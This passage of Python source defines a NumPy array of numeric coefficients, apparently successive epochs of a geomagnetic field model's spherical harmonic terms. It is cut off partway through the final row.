coeffs=np.array([[-31543, -2298, 5922, -677, 2905, -1061, 924, 1121, 1022, -1469, -330, 1256, 3, 572, 523, 876, 628, 195, 660, -69, -361, -210, 134, -75, -184, 328, -210, 264, 53, 5, -33, -86, -124, -16, 3, 63, 61, -9, -11, 83, -217, 2, -58, -35, 59, 36, -90, -69, 70, -55, -45, 0, -13, 34, -10, -41, -1, -21, 28, 18, -12, 6, -22, 11, 8, 8, -4, -14, -9, 7, 1, -13, 2, 5, -9, 16, 5, -5, 8, -18, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 8, 2, 10, -1, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 2, 4, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-31464, -2298, 5909, -728, 2928, -1086, 1041, 1065, 1037, -1494, -357, 1239, 34, 635, 480, 880, 643, 203, 653, -77, -380, -201, 146, -65, -192, 328, -193, 259, 56, -1, -32, -93, -125, -26, 11, 62, 60, -7, -11, 86, -221, 4, -57, -32, 57, 32, -92, -67, 70, -54, -46, 0, -14, 33, -11, -41, 0, -20, 28, 18, -12, 6, -22, 11, 8, 8, -4, -15, -9, 7, 1, -13, 2, 5, -8, 16, 5, -5, 8, -18, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 8, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 2, 4, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-31354, -2297, 5898, -769, 2948, -1128, 1176, 1000, 1058, -1524, -389, 1223, 62, 705, 425, 884, 660, 211, 644, -90, -400, -189, 160, -55, -201, 327, -172, 253, 57, -9, -33, -102, -126, -38, 21, 62, 58, -5, -11, 89, -224, 5, -54, -29, 54, 28, -95, -65, 71, -54, -47, 1, -14, 32, -12, -40, 1, -19, 28, 18, -13, 6, -22, 11, 8, 8, -4, -15, -9, 6, 1, -13, 2, 5, -8, 16, 5, -5, 8, -18, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 8, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 
0, 0, -2, 2, 4, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-31212, -2306, 5875, -802, 2956, -1191, 1309, 917, 1084, -1559, -421, 1212, 84, 778, 360, 887, 678, 218, 631, -109, -416, -173, 178, -51, -211, 327, -148, 245, 58, -16, -34, -111, -126, -51, 32, 61, 57, -2, -10, 93, -228, 8, -51, -26, 49, 23, -98, -62, 72, -54, -48, 2, -14, 31, -12, -38, 2, -18, 28, 19, -15, 6, -22, 11, 8, 8, -4, -15, -9, 6, 2, -13, 3, 5, -8, 16, 6, -5, 8, -18, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 8, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 1, 4, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-31060, -2317, 5845, -839, 2959, -1259, 1407, 823, 1111, -1600, -445, 1205, 103, 839, 293, 889, 695, 220, 616, -134, -424, -153, 199, -57, -221, 326, -122, 236, 58, -23, -38, -119, -125, -62, 43, 61, 55, 0, -10, 96, -233, 11, -46, -22, 44, 18, -101, -57, 73, -54, -49, 2, -14, 29, -13, -37, 4, -16, 28, 19, -16, 6, -22, 11, 7, 8, -3, -15, -9, 6, 2, -14, 4, 5, -7, 17, 6, -5, 8, -19, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 9, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 1, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30926, -2318, 5817, -893, 2969, -1334, 1471, 728, 1140, -1645, -462, 1202, 119, 881, 229, 891, 711, 216, 601, -163, -426, -130, 217, -70, -230, 326, -96, 226, 58, -28, -44, -125, -122, -69, 51, 61, 54, 3, -9, 99, -238, 14, -40, -18, 39, 13, 
-103, -52, 73, -54, -50, 3, -14, 27, -14, -35, 5, -14, 29, 19, -17, 6, -21, 11, 7, 8, -3, -15, -9, 6, 2, -14, 4, 5, -7, 17, 7, -5, 8, -19, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 9, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 1, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30805, -2316, 5808, -951, 2980, -1424, 1517, 644, 1172, -1692, -480, 1205, 133, 907, 166, 896, 727, 205, 584, -195, -422, -109, 234, -90, -237, 327, -72, 218, 60, -32, -53, -131, -118, -74, 58, 60, 53, 4, -9, 102, -242, 19, -32, -16, 32, 8, -104, -46, 74, -54, -51, 4, -15, 25, -14, -34, 6, -12, 29, 18, -18, 6, -20, 11, 7, 8, -3, -15, -9, 5, 2, -14, 5, 5, -6, 18, 8, -5, 8, -19, 8, 10, -20, 1, 14, -12, 5, 12, -3, 1, -2, -2, 9, 3, 10, 0, -2, -2, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 1, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30715, -2306, 5812, -1018, 2984, -1520, 1550, 586, 1206, -1740, -494, 1215, 146, 918, 101, 903, 744, 188, 565, -226, -415, -90, 249, -114, -241, 329, -51, 211, 64, -33, -64, -136, -115, -76, 64, 59, 53, 4, -8, 104, -246, 25, -25, -15, 25, 4, -106, -40, 74, -53, -52, 4, -17, 23, -14, -33, 7, -11, 29, 18, -19, 6, -19, 11, 7, 8, -3, -15, -9, 5, 1, -15, 6, 5, -6, 18, 8, -5, 7, -19, 8, 10, -20, 1, 15, -12, 5, 11, -3, 1, -3, -2, 9, 3, 11, 0, -2, -2, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -1, 2, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0], [-30654, -2292, 5821, -1106, 2981, -1614, 1566, 528, 1240, -1790, -499, 1232, 163, 916, 43, 914, 762, 169, 550, -252, -405, -72, 265, -141, -241, 334, -33, 208, 71, -33, -75, -141, -113, -76, 69, 57, 54, 4, -7, 105, -249, 33, -18, -15, 18, 0, -107, -33, 74, -53, -52, 4, -18, 20, -14, -31, 7, -9, 29, 17, -20, 5, -19, 11, 7, 8, -3, -14, -10, 5, 1, -15, 6, 5, -5, 19, 9, -5, 7, -19, 8, 10, -21, 1, 15, -12, 5, 11, -3, 1, -3, -2, 9, 3, 11, 1, -2, -2, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -1, 2, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30594, -2285, 5810, -1244, 2990, -1702, 1578, 477, 1282, -1834, -499, 1255, 186, 913, -11, 944, 776, 144, 544, -276, -421, -55, 304, -178, -253, 346, -12, 194, 95, -20, -67, -142, -119, -82, 82, 59, 57, 6, 6, 100, -246, 16, -25, -9, 21, -16, -104, -39, 70, -40, -45, 0, -18, 0, 2, -29, 6, -10, 28, 15, -17, 29, -22, 13, 7, 12, -8, -21, -5, -12, 9, -7, 7, 2, -10, 18, 7, 3, 2, -11, 5, -21, -27, 1, 17, -11, 29, 3, -9, 16, 4, -3, 9, -4, 6, -3, 1, -4, 8, -3, 11, 5, 1, 1, 2, -20, -5, -1, -1, -6, 8, 6, -1, -4, -3, -2, 5, 0, -2, -2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30554, -2250, 5815, -1341, 2998, -1810, 1576, 381, 1297, -1889, -476, 1274, 206, 896, -46, 954, 792, 136, 528, -278, -408, -37, 303, -210, -240, 349, 3, 211, 103, -20, -87, -147, -122, -76, 80, 54, 57, -1, 4, 99, -247, 33, -16, -12, 12, -12, -105, -30, 65, -55, -35, 2, -17, 1, 0, -40, 10, -7, 36, 5, -18, 19, -16, 22, 15, 5, -4, -22, -1, 0, 11, -21, 15, -8, -13, 17, 5, -4, -1, -17, 3, -7, -24, -1, 19, -25, 12, 10, 2, 5, 2, -5, 8, -2, 8, 3, -11, 8, -7, -8, 4, 13, -1, -2, 13, -10, -4, 
2, 4, -3, 12, 6, 3, -3, 2, 6, 10, 11, 3, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30500, -2215, 5820, -1440, 3003, -1898, 1581, 291, 1302, -1944, -462, 1288, 216, 882, -83, 958, 796, 133, 510, -274, -397, -23, 290, -230, -229, 360, 15, 230, 110, -23, -98, -152, -121, -69, 78, 47, 57, -9, 3, 96, -247, 48, -8, -16, 7, -12, -107, -24, 65, -56, -50, 2, -24, 10, -4, -32, 8, -11, 28, 9, -20, 18, -18, 11, 9, 10, -6, -15, -14, 5, 6, -23, 10, 3, -7, 23, 6, -4, 9, -13, 4, 9, -11, -4, 12, -5, 7, 2, 6, 4, -2, 1, 10, 2, 7, 2, -6, 5, 5, -3, -5, -4, -1, 0, 2, -8, -3, -2, 7, -4, 4, 1, -2, -3, 6, 7, -2, -1, 0, -3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30421, -2169, 5791, -1555, 3002, -1967, 1590, 206, 1302, -1992, -414, 1289, 224, 878, -130, 957, 800, 135, 504, -278, -394, 3, 269, -255, -222, 362, 16, 242, 125, -26, -117, -156, -114, -63, 81, 46, 58, -10, 1, 99, -237, 60, -1, -20, -2, -11, -113, -17, 67, -56, -55, 5, -28, 15, -6, -32, 7, -7, 23, 17, -18, 8, -17, 15, 6, 11, -4, -14, -11, 7, 2, -18, 10, 4, -5, 23, 10, 1, 8, -20, 4, 6, -18, 0, 12, -9, 2, 1, 0, 4, -3, -1, 9, -2, 8, 3, 0, -1, 5, 1, -3, 4, 4, 1, 0, 0, -1, 2, 4, -5, 6, 1, 1, -1, -1, 6, 2, 0, 0, -7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30334, -2119, 5776, -1662, 2997, -2016, 1594, 114, 1297, -2038, -404, 1292, 240, 856, -165, 957, 804, 148, 479, -269, -390, 13, 252, -269, -219, 358, 19, 254, 128, -31, -126, -157, -97, -62, 81, 45, 61, -11, 8, 100, -228, 68, 4, 
-32, 1, -8, -111, -7, 75, -57, -61, 4, -27, 13, -2, -26, 6, -6, 26, 13, -23, 1, -12, 13, 5, 7, -4, -12, -14, 9, 0, -16, 8, 4, -1, 24, 11, -3, 4, -17, 8, 10, -22, 2, 15, -13, 7, 10, -4, -1, -5, -1, 10, 5, 10, 1, -4, -2, 1, -2, -3, 2, 2, 1, -5, 2, -2, 6, 4, -4, 4, 0, 0, -2, 2, 3, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30220, -2068, 5737, -1781, 3000, -2047, 1611, 25, 1287, -2091, -366, 1278, 251, 838, -196, 952, 800, 167, 461, -266, -395, 26, 234, -279, -216, 359, 26, 262, 139, -42, -139, -160, -91, -56, 83, 43, 64, -12, 15, 100, -212, 72, 2, -37, 3, -6, -112, 1, 72, -57, -70, 1, -27, 14, -4, -22, 8, -2, 23, 13, -23, -2, -11, 14, 6, 7, -2, -15, -13, 6, -3, -17, 5, 6, 0, 21, 11, -6, 3, -16, 8, 10, -21, 2, 16, -12, 6, 10, -4, -1, -5, 0, 10, 3, 11, 1, -2, -1, 1, -3, -3, 1, 2, 1, -5, 3, -1, 4, 6, -4, 4, 0, 1, -1, 0, 3, 3, 1, -1, -4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30100, -2013, 5675, -1902, 3010, -2067, 1632, -68, 1276, -2144, -333, 1260, 262, 830, -223, 946, 791, 191, 438, -265, -405, 39, 216, -288, -218, 356, 31, 264, 148, -59, -152, -159, -83, -49, 88, 45, 66, -13, 28, 99, -198, 75, 1, -41, 6, -4, -111, 11, 71, -56, -77, 1, -26, 16, -5, -14, 10, 0, 22, 12, -23, -5, -12, 14, 6, 6, -1, -16, -12, 4, -8, -19, 4, 6, 0, 18, 10, -10, 1, -17, 7, 10, -21, 2, 16, -12, 7, 10, -4, -1, -5, -1, 10, 4, 11, 1, -3, -2, 1, -3, -3, 1, 2, 1, -5, 3, -2, 4, 5, -4, 4, -1, 1, -1, 0, 3, 3, 1, -1, -5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0], [-29992, -1956, 5604, -1997, 3027, -2129, 1663, -200, 1281, -2180, -336, 1251, 271, 833, -252, 938, 782, 212, 398, -257, -419, 53, 199, -297, -218, 357, 46, 261, 150, -74, -151, -162, -78, -48, 92, 48, 66, -15, 42, 93, -192, 71, 4, -43, 14, -2, -108, 17, 72, -59, -82, 2, -27, 21, -5, -12, 16, 1, 18, 11, -23, -2, -10, 18, 6, 7, 0, -18, -11, 4, -7, -22, 4, 9, 3, 16, 6, -13, -1, -15, 5, 10, -21, 1, 16, -12, 9, 9, -5, -3, -6, -1, 9, 7, 10, 2, -6, -5, 2, -4, -4, 1, 2, 0, -5, 3, -2, 6, 5, -4, 3, 0, 1, -1, 2, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29873, -1905, 5500, -2072, 3044, -2197, 1687, -306, 1296, -2208, -310, 1247, 284, 829, -297, 936, 780, 232, 361, -249, -424, 69, 170, -297, -214, 355, 47, 253, 150, -93, -154, -164, -75, -46, 95, 53, 65, -16, 51, 88, -185, 69, 4, -48, 16, -1, -102, 21, 74, -62, -83, 3, -27, 24, -2, -6, 20, 4, 17, 10, -23, 0, -7, 21, 6, 8, 0, -19, -11, 5, -9, -23, 4, 11, 4, 14, 4, -15, -4, -11, 5, 10, -21, 1, 15, -12, 9, 9, -6, -3, -6, -1, 9, 7, 9, 1, -7, -5, 2, -4, -4, 1, 3, 0, -5, 3, -2, 6, 5, -4, 3, 0, 1, -1, 2, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29775, -1848, 5406, -2131, 3059, -2279, 1686, -373, 1314, -2239, -284, 1248, 293, 802, -352, 939, 780, 247, 325, -240, -423, 84, 141, -299, -214, 353, 46, 245, 154, -109, -153, -165, -69, -36, 97, 61, 65, -16, 59, 82, -178, 69, 3, -52, 18, 1, -96, 24, 77, -64, -80, 2, -26, 26, 0, -1, 21, 5, 17, 9, -23, 0, -4, 23, 5, 10, -1, -19, -10, 6, -12, -22, 3, 12, 4, 12, 2, -16, -6, -10, 4, 9, -20, 1, 15, -12, 11, 9, -7, -4, -7, -2, 9, 7, 8, 1, -7, -6, 2, -3, -4, 2, 2, 1, -5, 3, -2, 
6, 4, -4, 3, 0, 1, -2, 3, 3, 3, -1, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29692, -1784, 5306, -2200, 3070, -2366, 1681, -413, 1335, -2267, -262, 1249, 302, 759, -427, 940, 780, 262, 290, -236, -418, 97, 122, -306, -214, 352, 46, 235, 165, -118, -143, -166, -55, -17, 107, 68, 67, -17, 68, 72, -170, 67, -1, -58, 19, 1, -93, 36, 77, -72, -69, 1, -25, 28, 4, 5, 24, 4, 17, 8, -24, -2, -6, 25, 6, 11, -6, -21, -9, 8, -14, -23, 9, 15, 6, 11, -5, -16, -7, -4, 4, 9, -20, 3, 15, -10, 12, 8, -6, -8, -8, -1, 8, 10, 5, -2, -8, -8, 3, -3, -6, 1, 2, 0, -4, 4, -1, 5, 4, -5, 2, -1, 2, -2, 5, 1, 1, -2, 0, -7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29619.400000000001, -1728.2, 5186.1000000000004, -2267.6999999999998, 3068.4000000000001, -2481.5999999999999, 1670.9000000000001, -458.0, 1339.5999999999999, -2288.0, -227.59999999999999, 1252.0999999999999, 293.39999999999998, 714.5, -491.10000000000002, 932.29999999999995, 786.79999999999995, 272.60000000000002, 250.0, -231.90000000000001, -403.0, 119.8, 111.3, -303.80000000000001, -218.80000000000001, 351.39999999999998, 43.799999999999997, 222.30000000000001, 171.90000000000001, -130.40000000000001, -133.09999999999999, -168.59999999999999, -39.299999999999997, -12.9, 106.3, 72.299999999999997, 68.200000000000003, -17.399999999999999, 74.200000000000003, 63.700000000000003, -160.90000000000001, 65.099999999999994, -5.9000000000000004, -61.200000000000003, 16.899999999999999, 0.69999999999999996, -90.400000000000006, 43.799999999999997, 79.0, -74.0, -64.599999999999994, 0.0, -24.199999999999999, 33.299999999999997, 6.2000000000000002, 9.0999999999999996, 
24.0, 6.9000000000000004, 14.800000000000001, 7.2999999999999998, -25.399999999999999, -1.2, -5.7999999999999998, 24.399999999999999, 6.5999999999999996, 11.9, -9.1999999999999993, -21.5, -7.9000000000000004, 8.5, -16.600000000000001, -21.5, 9.0999999999999996, 15.5, 7.0, 8.9000000000000004, -7.9000000000000004, -14.9, -7.0, -2.1000000000000001, 5.0, 9.4000000000000004, -19.699999999999999, 3.0, 13.4, -8.4000000000000004, 12.5, 6.2999999999999998, -6.2000000000000002, -8.9000000000000004, -8.4000000000000004, -1.5, 8.4000000000000004, 9.3000000000000007, 3.7999999999999998, -4.2999999999999998, -8.1999999999999993, -8.1999999999999993, 4.7999999999999998, -2.6000000000000001, -6.0, 1.7, 1.7, 0.0, -3.1000000000000001, 4.0, -0.5, 4.9000000000000004, 3.7000000000000002, -5.9000000000000004, 1.0, -1.2, 2.0, -2.8999999999999999, 4.2000000000000002, 0.20000000000000001, 0.29999999999999999, -2.2000000000000002, -1.1000000000000001, -7.4000000000000004, 2.7000000000000002, -1.7, 0.10000000000000001, -1.8999999999999999, 1.3, 1.5, -0.90000000000000002, -0.10000000000000001, -2.6000000000000001, 0.10000000000000001, 0.90000000000000002, -0.69999999999999996, -0.69999999999999996, 0.69999999999999996, -2.7999999999999998, 1.7, -0.90000000000000002, 0.10000000000000001, -1.2, 1.2, -1.8999999999999999, 4.0, -0.90000000000000002, -2.2000000000000002, -0.29999999999999999, -0.40000000000000002, 0.20000000000000001, 0.29999999999999999, 0.90000000000000002, 2.5, -0.20000000000000001, -2.6000000000000001, 0.90000000000000002, 0.69999999999999996, -0.5, 0.29999999999999999, 0.29999999999999999, 0.0, -0.29999999999999999, 0.0, -0.40000000000000002, 0.29999999999999999, -0.10000000000000001, -0.90000000000000002, -0.20000000000000001, -0.40000000000000002, -0.40000000000000002, 0.80000000000000004, -0.20000000000000001, -0.90000000000000002, -0.90000000000000002, 0.29999999999999999, 0.20000000000000001, 0.10000000000000001, 1.8, -0.40000000000000002, -0.40000000000000002, 1.3, -1.0, 
-0.40000000000000002, -0.10000000000000001, 0.69999999999999996, 0.69999999999999996, -0.40000000000000002, 0.29999999999999999, 0.29999999999999999, 0.59999999999999998, -0.10000000000000001, 0.29999999999999999, 0.40000000000000002, -0.20000000000000001, 0.0, -0.5, 0.10000000000000001, -0.90000000000000002], [-29554.630000000001, -1669.05, 5077.9899999999998, -2337.2399999999998, 3047.6900000000001, -2594.5, 1657.76, -515.42999999999995, 1336.3, -2305.8299999999999, -198.86000000000001, 1246.3900000000001, 269.72000000000003, 672.50999999999999, -524.72000000000003, 920.54999999999995, 797.96000000000004, 282.06999999999999, 210.65000000000001, -225.22999999999999, -379.86000000000001, 145.15000000000001, 100.0, -305.36000000000001, -227.0, 354.41000000000003, 42.719999999999999, 208.94999999999999, 180.25, -136.53999999999999, -123.45, -168.05000000000001, -19.57, -13.550000000000001, 103.84999999999999, 73.599999999999994, 69.560000000000002, -20.329999999999998, 76.739999999999995, 54.75, -151.34, 63.630000000000003, -14.58, -63.530000000000001, 14.58, 0.23999999999999999, -86.359999999999999, 50.939999999999998, 79.879999999999995, -74.459999999999994, -61.140000000000001, -1.6499999999999999, -22.57, 38.729999999999997, 6.8200000000000003, 12.300000000000001, 25.350000000000001, 9.3699999999999992, 10.93, 5.4199999999999999, -26.32, 1.9399999999999999, -4.6399999999999997, 24.800000000000001, 7.6200000000000001, 11.199999999999999, -11.73, -20.879999999999999, -6.8799999999999999, 9.8300000000000001, -18.109999999999999, -19.710000000000001, 10.17, 16.219999999999999, 9.3599999999999994, 7.6100000000000003, -11.25, -12.76, -4.8700000000000001, -0.059999999999999998, 5.5800000000000001, 9.7599999999999998, -20.109999999999999, 3.5800000000000001, 12.69, -6.9400000000000004, 12.67, 5.0099999999999998, -6.7199999999999998, -10.76, -8.1600000000000001, -1.25, 8.0999999999999996, 8.7599999999999998, 2.9199999999999999, -6.6600000000000001, -7.7300000000000004, 
-9.2200000000000006, 6.0099999999999998, -2.1699999999999999, -6.1200000000000001, 2.1899999999999999, 1.4199999999999999, 0.10000000000000001, -2.3500000000000001, 4.46, -0.14999999999999999, 4.7599999999999998, 3.0600000000000001, -6.5800000000000001, 0.28999999999999998, -1.01, 2.0600000000000001, -3.4700000000000002, 3.77, -0.85999999999999999, -0.20999999999999999, -2.3100000000000001, -2.0899999999999999, -7.9299999999999997, 2.9500000000000002, -1.6000000000000001, 0.26000000000000001, -1.8799999999999999, 1.4399999999999999, 1.4399999999999999, -0.77000000000000002, -0.31, -2.27, 0.28999999999999998, 0.90000000000000002, -0.79000000000000004, -0.57999999999999996, 0.53000000000000003, -2.6899999999999999, 1.8, -1.0800000000000001, 0.16, -1.5800000000000001, 0.95999999999999996, -1.8999999999999999, 3.9900000000000002, -1.3899999999999999, -2.1499999999999999, -0.28999999999999998, -0.55000000000000004, 0.20999999999999999, 0.23000000000000001, 0.89000000000000001, 2.3799999999999999, -0.38, -2.6299999999999999, 0.95999999999999996, 0.60999999999999999, -0.29999999999999999, 0.40000000000000002, 0.46000000000000002, 0.01, -0.34999999999999998, 0.02, -0.35999999999999999, 